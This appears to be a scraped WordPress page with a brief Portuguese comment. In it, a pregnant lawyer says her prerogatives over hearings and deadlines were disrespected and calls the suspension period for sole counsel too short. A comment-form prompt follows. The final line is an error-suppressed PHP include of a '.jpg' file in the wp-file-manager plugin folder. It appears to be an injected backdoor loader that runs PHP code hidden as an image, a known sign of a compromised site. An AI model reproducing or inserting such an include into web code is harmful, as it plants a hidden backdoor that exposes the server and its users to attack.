Em casos práticos do meu cotidiano como gestante, houve situações de desrespeito às minhas prerrogativas em relação a audiências e prazos particulares. Acredito ser insuficiente o prazo concedido de suspensão nos processos em que a advogada atua como única patrona, devendo haver uma concessão maior para se enquadrar às condições da mulher.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

@include "wp-content/plugins/wp-file-manager/lib/php/editors/OnlineConvert/include/0168.jpg";